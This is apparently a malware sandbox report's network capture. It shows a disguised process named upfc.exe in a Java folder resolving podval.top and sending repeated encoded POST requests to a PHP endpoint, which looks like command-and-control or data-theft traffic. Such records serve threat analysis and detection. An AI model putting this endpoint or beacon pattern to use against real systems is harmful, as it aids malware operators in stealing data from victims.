                                                    Jul 3, 2024 16:43:56.558155060 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.563131094 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.606980085 CEST4985680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.608407974 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.612401962 CEST8049856188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.612503052 CEST4985680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.613290071 CEST8049857188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.613382101 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.613468885 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.618427038 CEST8049857188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.683948040 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.712749004 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.719310045 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.719367981 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.797853947 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.802856922 CEST8049858188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.804502010 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.806241989 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.811085939 CEST8049858188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.964407921 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.969363928 CEST8049857188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.969445944 CEST8049857188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.043239117 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.068679094 CEST8049857188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.088404894 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.151961088 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.156852007 CEST8049858188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.189109087 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.269869089 CEST8049858188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.282243967 CEST8049857188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.400799990 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.400799990 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.612257004 CEST8049858188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.651892900 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.727724075 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.727801085 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.728590965 CEST4985980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.732975960 CEST8049857188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.733027935 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.733359098 CEST8049858188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.733402014 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.733498096 CEST8049859188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.733563900 CEST4985980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.733705044 CEST4985980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.738538980 CEST8049859188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.068661928 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.073829889 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.089350939 CEST4985980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.094314098 CEST8049859188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.166929007 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.167298079 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.172231913 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.172266960 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.179328918 CEST8049859188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.292402983 CEST4985980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.421811104 CEST8049859188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.469916105 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.512051105 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.540402889 CEST4985980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.540410042 CEST4986080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.545316935 CEST8049860188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.545613050 CEST8049859188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.545707941 CEST4985980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.545712948 CEST4986080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.545974970 CEST4986080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.550808907 CEST8049860188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.901098013 CEST4986080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.907418966 CEST8049860188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.023895979 CEST8049860188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.088825941 CEST4986080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.374684095 CEST8049860188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.480606079 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.485862017 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.506932974 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.511867046 CEST8049861188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.511940956 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.512029886 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.516882896 CEST8049861188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.550674915 CEST4986080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.580305099 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.580445051 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.585582972 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.585593939 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.869689941 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.874778986 CEST8049861188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.916098118 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.963274002 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.967328072 CEST8049861188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:00.034526110 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.180957079 CEST8049861188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:00.291419983 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.308410883 CEST4986080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.312412024 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.313646078 CEST4986280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.318592072 CEST8049862188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:00.319138050 CEST8049861188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:00.320455074 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.320569992 CEST4986280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.323920012 CEST4986280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.328792095 CEST8049862188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:00.682584047 CEST4986280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.687556982 CEST8049862188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:00.843276024 CEST8049862188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:00.900973082 CEST4986280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.933501959 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.938457012 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.087047100 CEST8049862188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.167434931 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.169346094 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.174240112 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.174331903 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.232861996 CEST4986280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.233612061 CEST4986380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.238018990 CEST8049862188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.238069057 CEST4986280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.238580942 CEST8049863188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.238646984 CEST4986380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.238754034 CEST4986380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.243503094 CEST8049863188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.556741953 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.588399887 CEST4986380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.593328953 CEST8049863188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.682054996 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.691766024 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.709464073 CEST8049863188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.809500933 CEST4986380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.885183096 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:02.059791088 CEST8049863188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:02.200407982 CEST4986380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:02.700428963 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:02.705490112 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:02.798968077 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:02.799320936 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:02.804279089 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:02.804450989 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:03.267462969 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:03.385206938 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:04.276415110 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:04.283276081 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:04.376106024 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:04.376370907 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:04.381294966 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:04.381475925 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:04.708268881 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:04.841785908 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:04.843137026 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:05.854451895 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:05.859400034 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.074498892 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.074637890 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.079705954 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.079716921 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.401403904 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.533691883 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.533802032 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.869473934 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.874388933 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.967807055 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.968131065 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.973316908 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973339081 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973349094 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973356009 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973386049 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.973390102 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973402977 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973412037 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973416090 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.973421097 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973431110 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973448992 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.973470926 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.973561049 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973603964 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978012085 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978029013 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978072882 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978095055 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978101969 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978111982 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978148937 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978204966 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978245974 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978259087 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978306055 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978318930 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978364944 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978394032 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978404999 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978424072 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978431940 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978456974 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978491068 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978535891 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978580952 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978590965 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978602886 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978614092 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978636980 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978661060 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978672028 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978682041 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978715897 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978737116 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978741884 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978746891 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978775024 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978784084 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978791952 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978830099 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.982930899 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.982959986 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.982990980 CEST4983080192.168.2.10188.114.97.3
                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Jul 3, 2024 16:42:09.438317060 CEST | 50270 | 53 | 192.168.2.10 | 1.1.1.1
                                                    Jul 3, 2024 16:42:09.472083092 CEST | 53 | 50270 | 1.1.1.1 | 192.168.2.10
                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                    Jul 3, 2024 16:42:09.438317060 CEST | 192.168.2.10 | 1.1.1.1 | 0x17df | Standard query (0) | podval.top | A (IP address) | IN (0x0001) | false
                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                    Jul 3, 2024 16:42:09.472083092 CEST | 1.1.1.1 | 192.168.2.10 | 0x17df | No error (0) | podval.top | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                    Jul 3, 2024 16:42:09.472083092 CEST | 1.1.1.1 | 192.168.2.10 | 0x17df | No error (0) | podval.top | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                    • podval.top
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.10 | 49707 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:09.488838911 CEST | 293 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:09.935415030 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:10.468069077 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:10 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=loc6lG5wKWm7ZbSkpAX1q2PREiPYgzjPYqD7AJiSEJYWD6iYpdyeB9XIWxNfb88BcCB%2FSX%2BSMYmzq8xEdtBokvnPuopUAGGbZNzAedrTuhSXSfD3A01dyYyP4F%2B7"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a3fbdbd44369-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:42:10.532926083 CEST | 269 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 384
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:10.651508093 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:10.935858011 CEST | 735 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:10 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1cR1vN83rK9CRUKGZJG%2FzcVtihTwfctxrvlmEU1ajo07XjH%2FUALcI3lUjqXVcqQrWGT6bodEtqfWOIV8jw%2BFx%2BIBV1i%2FGzd6TiBil8xFaIdESbGNysD2oIyo%2BQk5"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a40038624369-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:42:11.466447115 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:11.572489977 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:11.860438108 CEST | 580 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jw66tkK4Scusblw1mt5XuM0kk8BZWNo%2FVc5m5U%2FBlZ9aklgEigYoRjMqdhvEagQhRmOIX9yrn0y9BipyzFu9RtkCEEIquW%2BtSaHhYjA386H06O7yT8xsRjj1Cbvn"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4060e614369-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    1 | 192.168.2.10 | 49710 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:11.516130924 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1756
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:11.962743044 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:12.307713985 CEST | 727 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:12 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNR5dO3uv7rAEbxgBwdKGUcGP1%2FqPSUf5LISP6PEPSoKsCcaHO2uDJv7UUyll%2BeUt5pVDvtCeiUsw7IqXvxpRyVFgME8UeNqCQ2QoXdppw2UG9w8o5ky97DNs0nG"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4087fdd41d8-EWR
                                                    alt-svc: h2=":443"; ma=60


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    2 | 192.168.2.10 | 49711 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:12.273222923 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:12.645021915 CEST  1056               OUT        Data Raw: 5a 52 5f 5d 5b 59 57 5c 58 56 55 51 50 59 59 57 55 50 5e 58 51 5a 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZR_][YW\XVUQPYYWUP^XQZSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!18D$)3)>:#..$&!0'W/-< T$Z,"['$Y 5
                                                    Jul 3, 2024 16:42:12.741036892 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:13.098172903 CEST  578                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:13 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYastzGi9ZwMg6GjKJDwsFMaKJZAgFja0XEwRhZ%2FWIvJEWo0G0VTs5ufDsHerOAEcVpSkZhAxDnIPFnrSyzyaMfL6PTdyEmDZEP8w3OQnScvCoczP2XDfl%2Bfg4Hf"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a40d5edf5e62-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    3           192.168.2.10  49713        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:13.280425072 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
